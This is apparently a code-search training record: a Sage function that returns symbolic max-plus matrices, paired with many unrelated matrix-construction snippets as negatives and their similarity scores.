"0.7273192", "0.7266639", "0.725893", "0.7247856", "0.7245229", "0.7223091", "0.7207827", "0.7207159", "0.7194789", "0.7191841", "0.71648115", "0.7158346", "0.71554595", "0.71331006", "0.710514", "0.7103049", "0.70620286", "0.70268095", "0.7017761", "0.7008628", "0.7008628" ]
0.0
-1
r""" Return the ``d x d`` identity matrices on ``nvar`` variables.
def symbolic_max_plus_identity(d, nvar, ch=None):
    d = int(d)
    nvar = int(nvar)
    V = FreeModule(ZZ, nvar)
    e = ()
    zero = (V([0]*nvar),)

    data = [[zero if i == j else e for j in range(d)] for i in range(d)]
    return SymbolicMaxPlusMatrix(d, nvar, data, ch)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def identity_matrix(self, n):\r\n IdM = self.zeros_matrix(n, n)\r\n for i in range(n):\r\n IdM[i][i] = 1.0\r\n \r\n return IdM", "def identity(n):\r\n I = np.zeros((n, n))\r\n diag = np.ones(n)\r\n np.fill_diagonal(I, diag)\r\n return matrix(I)", "def identity_matrix(n):\n data = [[1 if c == r else 0 for c in range(n)] for r in range(n)]\n return Matrix(data)", "def matIxs( n ):\n rows, cols = np.indices( (n,n) )\n row = rows.flatten()\n col = cols.flatten()\n \n return map( lambda x: Vector( x[0], x[1] ), zip( col, row ) )", "def I(n):\n identity = Matrix(n,n)\n print identity.matrix\n index = 0 \n for i in range(identity.nrows):\n for j in range(identity.ncols):\n identity.matrix[i][index] = 1\n index += 1\n\n\n flat = []\n for i in range(identity.nrows):\n for j in range(identity.ncols):\n flat.append(identity.matrix[i][j])\n\n\n return identity", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix():\n return numpy.identity(4)", "def identity_matrix():\r\n return numpy.identity(4)", "def make_numpy_matrix(df,variables):\n observations = []\n for col in variables:\n observations.append(np.array(df[col]))\n observations = np.mat(observations).transpose().A #annoying numpy magic, and Tim loves it\n print observations.shape\n return observations", "def _identity_dense(d, dtype=complex):\n return np.eye(d, dtype=dtype)", "def generate_random_matrix(n):\n return [[random.randint(1, 50) for i in range(n)] for j in range(n)]", "def matEye(n):\n ret=matZeros((n,n))\n for i in range(n):\n matSet(ret,i,i,1)\n return ret", "def eye(cls, n, domain):\n # XXX: flint matrices do not have anything like eye\n return DDM.eye(n, domain).to_dfm()", "def identity(n):\n I = zeroes(n, n)\n for i in range(n):\n I.g[i][i] = 1.0\n return I", "def define_iid_random_variable(rv, num_vars):\n unique_variables = [rv]\n unique_var_indices = [np.arange(num_vars)]\n return IndependentMarginalsVariable(\n unique_variables, unique_var_indices)", "def get_dct_matrix(N):\r\n dct_m = np.eye(N)\r\n for k in np.arange(N):\r\n for i in np.arange(N):\r\n w = np.sqrt(2 / N)\r\n if k == 0:\r\n w = np.sqrt(1 / N)\r\n dct_m[k, i] = w * np.cos(np.pi * (i + 1 / 2) * k / N)\r\n idct_m = np.linalg.inv(dct_m)\r\n return dct_m, idct_m", "def _compute_ind_mat(n, m, nb_coeff):\r\n\r\n ind_mat = np.zeros((nb_coeff, n))\r\n curr_idx = 0\r\n for indexes in itr.combinations_with_replacement(range(m), n):\r\n ind_mat[curr_idx] = np.array(indexes)\r\n curr_idx += 1\r\n\r\n return ind_mat", "def identity(n,dtype=None):\n a = array([1]+n*[0],dtype=dtype)\n b = empty((n,n),dtype=dtype)\n b.flat = a\n return b", "def coordinate_matrix(n):\n xcoordinates = np.zeros((n,n))\n xcoordinates = xcoordinates + np.arange(0,worksize) #broadcasting trick\n ycoordinates = xcoordinates.T\n return np.array([ycoordinates,xcoordinates])", "def create_x_image(n):\n alist = create_diagonal_image(n)\n for i in range(0, n):\n alist[i][i]=1\n alist[i][n-1-i]=1\n return alist", "def idiosyncratic_var_vector(returns, idiosyncratic_var_matrix):\r\n\r\n return 
pd.DataFrame(np.diag(idiosyncratic_var_matrix), returns.columns)", "def identMatrix(size):\n returnvalue = Matrix()\n for i in range(size):\n newrow = [0] * size\n newrow[i] = 1\n returnvalue.addRow(*newrow)\n return returnvalue", "def direct_obs_matrix(Nx,obs_inds):\n Ny = len(obs_inds)\n H = zeros((Ny,Nx))\n H[range(Ny),obs_inds] = 1\n return H", "def identity(cls,N:int)-> 'Matrix': #note single quotes because this is the class, itself and has not been completely defined yet.\n\n # -------------------------------------------------------\n # TODO: You write this one.\n # I'd suggest that you start by using another method to get a matrix of the right size, and then modify it.\n\n\n I = cls.zeros((N,N))\n for i in range(N):\n I.mat[i][i] = 1\n return I\n\n return Matrix([[\"Not yet written\"]]) # remove this when you add your code.\n # -------------------------------------------------------", "def eye(n,M=None, k=0, dtype=float):\n return asmatrix(np.eye(n,M,k,dtype))", "def build_difs_matrix(xs):\n n = len(xs)\n difs = np.zeros((n, n, 2))\n for row_id in range(n):\n ident = -np.eye(n)\n ident[:, row_id] += 1\n difs[row_id, :, 0] = ident @ xs[:, 0]\n difs[row_id, :, 1] = ident @ xs[:, 1]\n return difs", "def get_matrixS(n):\n\n mat_nxn = np.zeros([n, n], dtype=int)\n for row_num in range(1, n + 1):\n i = row_num - 1\n if row_num == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == 2:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == n - 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num == n:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 0:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n mat_nxn = mat_nxn + np.eye(n, dtype=int)\n mat_2nx2n = np.repeat(np.repeat(mat_nxn, 2, 0), 2, 1)\n return torch.as_tensor(mat_2nx2n)", "def generate_positive_semi_definite_matrix(n_dim):\n cov = np.random.randn(n_dim, n_dim)\n return np.dot(cov, cov.T)", "def create_dims(self, n_vec, m_vec):\n dims_mat = np.array([], dtype=np.int64).reshape(2, 0)\n for n in n_vec:\n for m in m_vec[m_vec > n]:\n dims_mat = np.hstack((dims_mat,\n np.array([[n], [m]])))\n return dims_mat", "def to_array(X, n=2):\n return np.array([np.eye(n)[x] for x in X])", "def vars(self):\n return [Var(i,self.dims[i]) for i in range(self.nvar)] # TODO: use stored state info (=1 sometimes)", "def _make_random_matrix(self, n_components, n_features):", "def generate_random_sparse_array(nrows, ncols, numdense):\n i = np.random.randint(0, nrows, numdense)\n j = np.random.randint(0, ncols, numdense)\n data = np.random.randint(1,6, numdense)\n ij = np.vstack((i,j))\n return coo_matrix((data, ij), shape=(nrows, ncols))", "def unfold_grid(var):\n if (len(var.shape)==2): # 2-D variable\n work = N.concatenate((N.zeros((var.shape[0],24),float),var),1)\n work[39:68,0:24] = work[39:68,var.shape[1]:]\n work[39:68,var.shape[1]:] = 0.0\n elif (len(var.shape)==3): # 3-D variable\n work = (N.concatenate((N.zeros((var.shape[0],var.shape[1],24),float),\n var),2))\n work[:,39:68,0:24] = work[:,39:68,var.shape[2]:]\n work[:,39:68,var.shape[2]:] = 0.0\n\n return work", "def create_matrix(n, m):\n matrix = [[None]*m for i in range(n)]\n return matrix", "def createarray(m,n):\n return( np.ones((m,2,n)) )", "def diag_indices(n, ndim=2):\r\n idx = np.arange(n)\r\n return (idx,) * ndim", "def build_toy_dataset(N):\n pi = np.array([0.4, 0.6])\n mus = [[1, 1], [-1, -1]]\n stds 
= [[0.1, 0.1], [0.1, 0.1]]\n x = np.zeros((N, 2), dtype=np.float32)\n\n for n in range(N):\n k = np.argmax(np.random.multinomial(1, pi))\n x[n, :] = np.random.multivariate_normal(mus[k], np.diag(stds[k]))\n\n return x", "def makeHadamard(n, d):\n return [[1 if d[\"r%dc%d\" % (i, j)] else 0 for j in range(n)] for i in range(n)]", "def irandmatrix(n, range = 10):\n A = mp.matrix(n, n)\n for i in xrange(n):\n for j in xrange(n):\n A[i,j]=int( (2 * mp.rand() - 1) * range)\n return A", "def reshape_var(var):\n dims = np.shape(var)\n nx = dims[0]\n ny = dims[1]\n nz = dims[2]\n\n var_2d = var.reshape(nx * ny, nz)\n return var_2d", "def Dinvmatrix(N):\r\n import numpy as np\r\n D = np.zeros((N,N,2))\r\n D[:,:,0] = np.diag((np.append(np.ones((1,int(N/2))),np.zeros((1,int(N/2))))))\r\n D[:,:,1] = np.diag((np.append(np.zeros((1,int(N/2))),np.ones((1,int(N/2))))))\r\n return D", "def normal(n):\n m=np.zeros((n,n))\n for i,j in itertools.product(range(n), range(n)):\n m[i][j]=normalvariate(0,1)\n return m", "def init(nvars, shape, dtype=float, masked=True):\n fun = ma.zeros if masked else np.zeros\n for _ in range(nvars):\n yield fun(shape, dtype=dtype)", "def makeIncidenceMatrix(self, variable, token, mechanism, network):\n model = self.model\n size = self.size_of_variable( variable )\n mat = np.zeros(size)\n for i, (label, node) in enumerate(model.nodes.items()):\n if node.named_network in self.nw_nnw_dict[network]:\n for j, (arc_label, arc) in enumerate(model.arcs.items()):\n if str(node.label) == str(arc.source) and mechanism == arc.mechanism:\n mat[i, j] = -1.\n elif str(node.label) == str(arc.sink) and mechanism == arc.mechanism:\n mat[i, j] = 1.\n return mat", "def idiosyncratic_var_matrix(returns, factor_returns, factor_betas, ann_factor):\r\n residuals_ = returns - pd.DataFrame(np.dot(factor_returns, factor_betas.T), index=returns.index, columns=returns.columns)\r\n return pd.DataFrame(np.diag(residuals_.var(axis=0, ddof=1) * ann_factor),returns.columns,returns.columns)", "def make_matrix(n):\n #number that makes up the matrix depending on value of n\n num = 1/n**2\n #creates a blur box as a dictionary\n blur_box = {'height': n, 'width': n, 'pixels': [num]*n**2 }\n return blur_box", "def gen_mats(seed, shape, n=4, fmt=\"csr\", density=0.1):\n\n np.random.seed(seed)\n dens = density * np.random.random()\n mats = [sp.random(*shape, density=dens, format=fmt) for i in range(n)]\n return mats", "def get_extremist_network(Nx, Dx):\n N = np.zeros([Nx, Nx], dtype=int)\n\n for i in range(0, Nx): # Iterate over the upper diagonal only\n for j in range(i+1, Nx):\n r = rg.random() # r is in [0.0, 1.0)\n if r <= Dx:\n N[i][j] = 1\n N[j][i] = 1\n return N", "def generate_matrix(size) -> np.ndarray:\n np.random.seed(1)\n return np.random.rand(size, size) - 0.5", "def get_identity(l):\n identity = np.zeros((l, l))\n for i in range(l):\n identity[i][i] = 1\n return identity", "def idensity(n):\n I = zeroes(n, n)\n for i in range(n):\n I.g[i][i] = 1.0\n return I", "def var(self,i): # TODO: change to property to access (read only?) 
X?\n return Var(i,self.dims[i])", "def xn_xn_prod(self,x_n):\n \n x_n_tiled =T.tile(x_n,(self.num_vars,1))\n \n return T.transpose(x_n_tiled)*x_n_tiled", "def init_matrix(x_dim = 10, y_dim = 10):\n ret = np.zeros((x_dim, y_dim))\n x_rand = np.random.randint(0, x_dim - 1)\n y_rand = np.random.randint(0, y_dim - 1)\n ret[x_rand, y_rand] = 1\n\n return(ret)", "def get_multivariate_matrix(x_data, D):\n rows = []\n terms = get_polynomial(['x1', 'x2', 'x3', 'x4', 'x5'], D)\n for row in range(len(x_data)):\n row_data = {}\n row_data['x1'] = x_data[row, 0]\n row_data['x2'] = x_data[row, 1]\n row_data['x3'] = x_data[row, 2]\n row_data['x4'] = x_data[row, 3]\n row_data['x5'] = x_data[row, 4]\n \n row_entry = []\n for t in terms:\n prod = 1\n for var in t:\n prod *= row_data[var]\n row_entry.append(prod)\n \n row_entry = np.array(row_entry) \n rows.append(row_entry)\n return np.vstack(rows)", "def nvar(self):\n return self.h.shape[0]", "def make_synthetic_matrix(n_features, n_samples, sparsity=.98, random_state=0):\n prng = check_random_state(random_state)\n prec = make_sparse_spd_matrix(n_features, alpha=sparsity,\n smallest_coef=.4, largest_coef=.7,\n random_state=prng)\n cov = linalg.inv(prec)\n d = np.sqrt(np.diag(cov))\n cov /= d\n cov /= d[:, np.newaxis]\n prec *= d\n prec *= d[:, np.newaxis]\n X = prng.multivariate_normal(np.zeros(n_features), cov, size=n_samples)\n X -= X.mean(axis=0)\n X /= X.std(axis=0)\n # Estimate the covariance\n emp_cov = np.dot(X.T, X) / n_samples\n return emp_cov, prec", "def makeIdentity(m):\n Matrix.validate_dimensions(m, m)\n data = [[1 if i == j else 0 for j in range(m)] for i in range(m)]\n return IntegerMatrix(m, m, data)", "def _instantiate_vars(labels: np.ndarray):\n n = len(labels)\n if len(set(labels)) == n:\n index_seed = np.arange(n)\n index_remain = np.arange(n)\n else:\n index_seed = np.argwhere(labels >= 0).ravel()\n index_remain = np.argwhere(labels < 0).ravel()\n labels = labels[index_seed]\n return index_seed.astype(np.int32), index_remain.astype(np.int32), labels.astype(np.int32)", "def crear_matrix(nxn):\n matrix =[]\n for i in range(nxn):\n matrix.append([])\n for e in range(nxn):\n matrix[i].append(\"\")\n return matrix", "def simulator(n, mu, covmat):\n a = np.random.multivariate_normal(mu, covmat, n)\n return [tuple(a[i, :]) for i in range(n)]", "def generate_sparse_randn(n, s):\n x = np.zeros(n)\n I = np.random.randint(0, n, s)\n x[I] = np.random.randn(s)\n return x", "def _defineNAVars(self, vars):\n self.na_dict[\"NV\"] = len(vars)\n self.na_dict[\"VNAME\"] = []\n self.na_dict[\"VMISS\"] = []\n self.na_dict[\"VSCAL\"] = []\n self.na_dict[\"V\"] = []\n\n for var in vars:\n name = xarray_utils.getBestName(var)\n self.na_dict[\"VNAME\"].append(name)\n miss = xarray_utils.getMissingValue(var)\n miss = self._resolve_float(miss)\n\n self.na_dict[\"VMISS\"].append(miss)\n self.na_dict[\"VSCAL\"].append(1)\n\n # Populate the variable list with the array\n # Make sure missing values are converted to real values using the required missing value\n self.na_dict[\"V\"].append(xarray_utils.getArrayAsList(var, missing_value=miss, handle_datetimes=True))\n\n # Create independent variable info\n if not \"X\" in self.na_dict:\n\n # Set up lists ready to populate with values\n self.na_dict[\"NXDEF\"] = []\n self.na_dict[\"NX\"] = []\n\n self.ax0 = xarray_utils.get_coord_by_index(var, 0)\n\n self.na_dict[\"X\"] = [xarray_utils.getArrayAsList(self.ax0)]\n self.na_dict[\"XNAME\"] = [xarray_utils.getBestName(self.ax0)]\n\n if len(self.ax0) == 1:\n 
self.na_dict[\"DX\"] = [0]\n else:\n # Set default increment as gap between first two\n incr = xarray_utils.get_interval(self.ax0, 0, 1)\n\n self.na_dict[\"DX\"] = [incr]\n # Now overwrite it as zero if non-uniform interval in axis\n\n for i in range(1, len(self.ax0)):\n if xarray_utils.get_interval(self.ax0, i-1, i) != incr:\n self.na_dict[\"DX\"] = [0]\n break\n\n # If 1D only then \"X\" should only be a list and not list of lists\n if self.na_dict[\"FFI\"] in (1001, 1010, 1020):\n self.na_dict[\"X\"] = self.na_dict[\"X\"][0]\n\n # If FFI is 1020 need to reduce axis down to reduced values as most are implied\n if self.na_dict[\"FFI\"] == 1020: \n vals = self.na_dict[\"X\"]\n self.na_dict[\"X\"] = vals[0:len(vals):self.na_dict[\"NVPM\"]] \n\n # Now add the rest of the axes to the self.na_dict objects \n for axis in xarray_utils.getAxisList(var)[1:]:\n self._appendAxisDefinition(axis)\n\n # If FFI is 2110 then need to modify the \"NX\" and \"X\" lists to cope with odd shape\n # Also need to add NX to auxiliary variables\n if self.na_dict[\"FFI\"] == 2110:\n new_x = []\n new_nx = []\n ax2_values = xarray_utils.get_coord_by_index(var, 1).data.tolist()\n\n for i in self.ax0[:]:\n new_x.append([i, ax2_values])\n new_nx.append(len(ax2_values))\n\n # Re-assign to new lists\n self.na_dict[\"NX\"] = new_nx\n self.na_dict[\"X\"] = new_x \n\n # Now auxiliary variable info here with independent var info\n # First aux var is NX\n self.na_dict[\"A\"] = [self.na_dict[\"NX\"][:]]\n ind_var_name = self.na_dict[\"XNAME\"][0]\n self.na_dict[\"ANAME\"] = [\"Number of '%s' values recorded in subsequent data records\" % ind_var_name]\n self.na_dict[\"AMISS\"] = [-9999.999]\n self.na_dict[\"ASCAL\"] = [1.0]\n\n # If FFI is 2310 then need to modify na_dict items for that\n elif self.na_dict[\"FFI\"] == 2310:\n new_x = []\n new_nx = []\n new_dx = []\n ax2_values = xarray_utils.get_coord_by_index(var, 1).data.tolist()\n incr = xarray_utils.get_interval(ax2_values, 0, 1)\n\n for i in self.ax0[:]:\n new_x.append([i, ax2_values])\n new_nx.append(len(ax2_values))\n new_dx.append(incr)\n\n # Re-assign to new lists\n self.na_dict[\"NX\"] = new_nx\n self.na_dict[\"X\"] = new_x\n self.na_dict[\"DX\"] = new_dx\n\n # Now auxiliary variable info here with independent var info\n # First three aux vars are NX, X0 and DX\n self.na_dict[\"A\"] = []\n self.na_dict[\"A\"].append(self.na_dict[\"NX\"][:])\n self.na_dict[\"A\"].append([i[1][0] for i in self.na_dict[\"X\"]])\n self.na_dict[\"A\"].append(self.na_dict[\"DX\"][:])\n\n ind_var_name = self.na_dict[\"XNAME\"][0]\n self.na_dict[\"ANAME\"] = [\"Number of '%s' values recorded in subsequent data records\" % ind_var_name,\n \"'%s' value for first data point\" % ind_var_name,\n \"'%s' increment\" % ind_var_name]\n self.na_dict[\"AMISS\"] = [-9999.999, -9999.999, -9999.999]\n self.na_dict[\"ASCAL\"] = [1.0, 1.0, 1.0]", "def matrix_generate(n):\n a = np.eye(n)\n max = 0\n for i in range(n):\n for j in range(n):\n a[i][j] = random.randint(0,50)\n a[j][i] = a[i][j]\n if a[i][j] > max:\n max = a[i][j]\n for i in range(n):\n a[i][i] = max * n + random.randint(20,40)\n return np.array(a)", "def build_Xij_inv_matrix(self,Nmesh=64):\n H0, F = self.cosmo.H0, self.cosmo.F\n Lbox = self.attrs['Lbox']\n kgrid = initialize_kgrid(Nmesh,Lbox)\n kmag_grid = np.linalg.norm(kgrid,axis=3)\n w_grid = self.cosmo.Pk_lin(kmag_grid)*(1/Lbox**3)*np.exp(-kmag_grid*kmag_grid*self.RG*self.RG)\n k2 = kmag_grid**2\n k2[0,0,0] = 1 \n #----------------------------------------------------\n cspace = 
np.arange(0,18)\n \n xij_tensor = [[np.sum(np.conj(Hhats[i](kgrid,k2,H0,F))*Hhats[j](kgrid,k2,H0,F)*w_grid)\n for j in cspace[self.cmask]] for i in cspace[self.cmask]]\n \n xij_tensor = np.array(xij_tensor)\n self.xij_tensor_inv = np.linalg.inv(xij_tensor.real)", "def make_matrix():\n row, col = [int(x) for x in input().split()]\n island = [[int(x) for x in input().split()] for _ in range(row)]\n return row, col, island", "def generate_onehot_matrix(n: int = 1024, ndim: int = 8, random_seed: int = None) -> TYPE_ARRAY:\n to_vec = lambda x: [1 if i == x else 0 for i in range(ndim)]\n return numpy.array([to_vec(x) for x in _RNG.randint(0, ndim, n)]).astype(int)", "def __init__(self, n):\n\t\tself._matr = []\n\t\tfor i in range(n):\n\t\t\tself._matr.append([])\n\t\t\tfor j in range(n):\n\t\t\t\tself._matr[i].append(False)", "def _make_random_matrix(self, n_components, n_features):\n #random_state = check_random_state(self.random_state)\n return _gaussian_random_matrix(\n n_components, n_features, random_state=self.random_state\n )", "def make_matrix(sizex, sizey):\n return [[0]*sizey for i in xrange(sizex)]", "def construct_M_N(n):\n n2 = n**2\n D0 = 2*np.ones(n2) # 0th diagonal\n D1 = - np.ones(n2 - 1) # -1st, 1st diagonals\n D1[n-1::n] = 0 # Setting every k*n-1 entries = 0 for k < n\n DN = - np.ones(n2 - n) # -nth, nth diagonals\n return (scipy.sparse.diags((D1, D0, D1), (-1, 0, 1), shape=(n2, n2), format=\"csr\"),\n scipy.sparse.diags((DN, D0, DN), (-n, 0, n), shape=(n2, n2), format=\"csr\"))", "def new_game(n):\n matrix = []\n\n for i in range(n):\n matrix.append([0] * n)\n return matrix", "def get_stain_matrix(I):", "def create_array( n ):", "def FE_create_interaction_vars(df, intxn_vars):\r\n df = df.copy(deep=True)\r\n for (each_intxn1,each_intxn2) in intxn_vars:\r\n new_col = each_intxn1 + '_x_' + each_intxn2\r\n try:\r\n df[new_col] = df[each_intxn1] * df[each_intxn2]\r\n except:\r\n continue\r\n return df", "def make_xyz(df: pd.DataFrame,\n response_var: list,\n fixed_var: list = ['Sex']) -> np.ndarray:\n x = pd.get_dummies(df[fixed_var]).to_numpy()\n x = np.fliplr(x)\n n_animals = df.shape[0] # to fix z the the same shape\n z = np.identity(n_animals)[1]\n y = df[[response_var]].to_numpy()\n\n return x, z, y", "def matrix_initialization(variable):\n # Range of value for 11 and 22\n min_11 = 2.0\n max_11 = 4.5\n # Range of random values for 33\n min_33 = 8.0\n max_33 = 13.0\n # range of values for off-diagonal\n min_offdiag = -0.8\n max_offdiag = 0.8\n\n if variable[-2:] == \"33\":\n return np.round(min_33 + (max_33 - min_33) * np.random.rand(), 1)\n if variable[-1] == variable[-2]:\n return np.round(min_11 + (max_11 - min_11) * np.random.rand(), 1)\n return np.round(min_offdiag + (max_offdiag - min_offdiag) * np.random.rand(), 1)", "def random_transition_matrix(n: int) -> np.ndarray:\n\n x = np.abs(np.random.normal(size=(n, n)))\n rsum = x.sum(axis=1)\n return x / rsum[:, np.newaxis]", "def generate(n):\n \n m1 = np.zeros((n, n), dtype = int)\n m2 = np.zeros((n, n), dtype = int)\n \n for i in range(n):\n for j in range(n):\n m1[i][j] = (j % 32)\n m2[i][j] = (j % 64)\n \n return m1,m2", "def __init__(self, n):\r\n self.matr = []\r\n self.n = n\r\n for i in range(n):\r\n self.matr.append([])\r\n for j in range(n):\r\n self.matr[i].append(False)", "def make_data(n,m):\n I = range(1,n+1)\n J = range(1,m+1)\n x,y,w = {},{},{}\n for i in I:\n x[i] = random.randint(0,100)\n y[i] = random.randint(0,100)\n w[i] = random.randint(1,5)\n return I,J,x,y,w", "def __init__(self, n):\r\n self.size = 
n\r\n self.mat = []\r\n for i in range(n):\r\n self.mat.append([0] * n)", "def make_matrix(sizex, sizey):\n return [[0] * sizey for i in range(sizex)]", "def create_variable_array(times):\n R=np.empty(np.sum(times))\n return R", "def initial_x():\n\n # RANDOMLY GENERATES the INITIAL VALUES of the independent variables:\n temp = [uniform(1, cfg.n) for i in range(cfg.n)]\n\n return np.array(temp, dtype=np.float_)", "def generate_pos_def(n):\n A = np.random.normal(size=(n,n)) + 1j * np.random.normal(size=(n,n))\n A += np.conjugate(A).T\n # Add just enough of an identity matrix to make all eigenvalues positive\n A += -1.01*np.min(np.linalg.eigvalsh(A))*np.identity(n)\n return A", "def generate_grid(nrows, ncols, ndots):\n\n # Validation\n if nrows * ncols < ndots:\n raise Exception(\"ndots must be <= than grid size\")\n\n rows = np.arange(1, nrows + 1)\n cols = np.arange(1, ncols + 1)\n\n # Create empty matrix\n grid = np.empty((len(rows), len(cols), 2), dtype=np.intp)\n grid[..., 0] = rows[:, None]\n grid[..., 1] = cols \n\n return grid.reshape(nrows * ncols, -1)[:ndots]", "def marginals(self):\n all_variables = [None for ii in range(self.nvars)]\n for ii in range(self.nunique_vars):\n for jj in self.unique_variable_indices[ii]:\n all_variables[jj] = self.unique_variables[ii]\n return all_variables", "def create_matrix(list_of_edges, n):\n matrix = [[0 for i in range(n)] for j in range(n)]\n ind = 0\n for i in range(n):\n for j in range(i):\n matrix[i][j] = list_of_edges[ind]\n matrix[j][i] = list_of_edges[ind]\n ind += 1\n return matrix", "def zeros(m, n):\n data = dict.fromkeys(itertools.product(range(m), range(n)), mpfr(0))\n return MPMatrix((m, n), data)", "def get5x5matrix(self): #modified from nxvasc get3x3matrix()\n try:\n i = na.identity(3)\n \n self.d124 = i.copy()\n self.ds124 = na.zeros(124,na.float64)\n \n for k in range(1,124):\n self.d124 = na.concatenate((self.d124,i))\n# print len(self.d124)\n count = 0\n a = []\n for k in range(-2,3):\n for j in range(-2,3):\n for i in range(-2,3):\n if( i != 0 or j != 0 or k != 0 ):\n self.ds124[count] = math.sqrt(i**2+j**2+k**2)\n count += 1\n a.append(i)\n a.append(j)\n a.append(k)\n# print len(a)\n a = na.reshape(na.array(a),(372,1))\n# print len(self.d124)\n self.d124 = na.concatenate((self.d124,a),axis=1)\n except Exception as error:\n print(\"failed in get5x5matrix(): \", error)", "def random_density_matrix(nqubits: int, dtype=np.complex128) -> np.ndarray:\n rho = random_numpy_hermitian(nqubits, dtype=dtype)\n # Normalize\n ids = np.arange(2 ** nqubits)\n rho[ids, ids] = rho[ids, ids] / np.trace(rho)\n return rho.astype(dtype)", "def generate_pos_def_all_pos(n):\n A = np.random.uniform(size=(n,n))\n A += A.T\n # Add just enough of an identity matrix to make all eigenvalues positive\n A += -1.01*np.min(np.linalg.eigvalsh(A))*np.identity(n)\n return A", "def EmptyStateMat(nX,nU,nY):\n Xx = np.zeros((nX,nX)) # Ac \n Yx = np.zeros((nY,nX)) # Gc \n Xu = np.zeros((nX,nU)) # Xu \n Yu = np.zeros((nY,nU)) # Jc \n return Xx,Xu,Yx,Yu", "def synthesize_data_X(n_x, m, mu_x = sp.random.random(1) * 25, sigma_x = sp.random.random(1) * 25):\n # Create a (1*m) array that represents m examples of a feature x_i.\n x_i = sp.random.normal(mu_x, sigma_x, m).reshape(1, m)\n # Compile all n_x x_i's into a matrix X, dim (n_x * m).\n X = np.matrix(np.array([sp.random.normal(mu_x, sigma_x, m).reshape(1, m)\n for i in range(n_x)])).reshape(n_x, m)\n return X, n_x, m, mu_x, sigma_x", "def create_diagonal_image(n):\n alist = []\n for i in range(0, n):\n 
alist.append([])\n for j in range(0,n):\n if i ==j:\n alist[i].append(1)\n else:\n alist[i].append(0)\n\n ##########\n # img = create_zeroed_image(n)\n # for i in range(n):\n# for j in range(n):\n# if i == j:\n# img[i][j] = 1\n #######\n \n return alist" ]
[ "0.6807005", "0.63776374", "0.63734645", "0.63494134", "0.6294045", "0.6278014", "0.6278014", "0.61580557", "0.61580557", "0.61580557", "0.615476", "0.6121155", "0.6051036", "0.601457", "0.58180785", "0.5777933", "0.57341456", "0.5717382", "0.5687784", "0.5684385", "0.5680099", "0.5672847", "0.5670253", "0.5622504", "0.5604844", "0.5603232", "0.55817324", "0.55645996", "0.55474067", "0.554359", "0.5521029", "0.5509594", "0.54692394", "0.545146", "0.5449567", "0.5428243", "0.5426758", "0.5412075", "0.54081684", "0.53864765", "0.53850555", "0.53832114", "0.5354908", "0.5350996", "0.5340386", "0.533802", "0.53275317", "0.53251094", "0.5316921", "0.5314654", "0.5308686", "0.5300276", "0.52708554", "0.52675295", "0.52621925", "0.52620864", "0.5251341", "0.52472085", "0.52387774", "0.5229686", "0.522429", "0.5224283", "0.52172196", "0.5205456", "0.5182113", "0.51784873", "0.51711595", "0.51607215", "0.51528317", "0.51524043", "0.5149917", "0.5142965", "0.51321614", "0.51278394", "0.51167244", "0.51126456", "0.5103993", "0.510277", "0.50977796", "0.50955623", "0.5077434", "0.50731003", "0.5068964", "0.5067611", "0.5064672", "0.5056716", "0.505666", "0.505613", "0.50490165", "0.5041239", "0.5032271", "0.5032065", "0.5026967", "0.5021533", "0.50180745", "0.5011186", "0.501036", "0.5004049", "0.49969843", "0.49966446", "0.49963754" ]
0.0
-1
r""" Return ``n`` independent symbolic matrices in dimension ``d``.
def symbolic_max_plus_matrices(d, n, ch=None, typ='sym'):
    d = int(d)
    n = int(n)
    if d <= 0:
        raise ValueError("d (= {}) must be postive".format(d))
    nvar = n * d * d
    V = FreeModule(ZZ, nvar)
    B = ((b,) for b in V.basis())
    matrices = []

    if d == 1:
        typ = 'full'

    if typ == 'sym' or typ == 'quick':
        z = [0]*nvar
        for i in range(n):
            z[i*d*d] = 1
            diag = (V(z),)
            z[i*d*d] = 0
            z[i*d*d+1] = 1
            nondiag = (V(z),)
            z[i*d*d+1] = 0
            if typ == 'sym':
                matrices.append(SymbolicSymmetricMaxPlusMatrix(d, n, diag, nondiag, ch))
            else:
                matrices.append(QuickSymbolicSymmetricMaxPlusMatrix(d, n, diag, nondiag, ch))
    elif typ == 'full':
        for i in range(n):
            mat = []
            for j in range(d):
                mat.append([next(B) for k in range(d)])
            matrices.append(SymbolicMaxPlusMatrix(d, nvar, mat, ch))
    else:
        raise ValueError

    return matrices
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def basis(d, symbolic=True):\n X = sym.symbols('X')\n if d == 0:\n phi_sym = [1]\n else:\n if symbolic:\n h = sym.Rational(1, d) # node spacing\n nodes = [2*i*h - 1 for i in range(d+1)]\n else:\n nodes = np.linspace(-1, 1, d+1)\n \n phi_sym = [Lagrange_polynomials(X, r, nodes) for r in range(d+1)]\n \n # Transform to Python functions\n phi_num = [sym.lambdify([X], phi_sym[r], modules='numpy') for r in range(d+1)]\n return phi_sym if symbolic else phi_num", "def makeHadamard(n, d):\n return [[1 if d[\"r%dc%d\" % (i, j)] else 0 for j in range(n)] for i in range(n)]", "def matIxs( n ):\n rows, cols = np.indices( (n,n) )\n row = rows.flatten()\n col = cols.flatten()\n \n return map( lambda x: Vector( x[0], x[1] ), zip( col, row ) )", "def matrix_chain_dynamic(dimensions, n):\n\n m = [[-1 for _ in range(n)] for _ in range(n)]\n s = [[0 for _ in range(n)] for _ in range(n)]\n\n # multiplying matrix by itself\n for i in range(1, n):\n m[i][i] = 0\n\n for length in range(2, n):\n for i 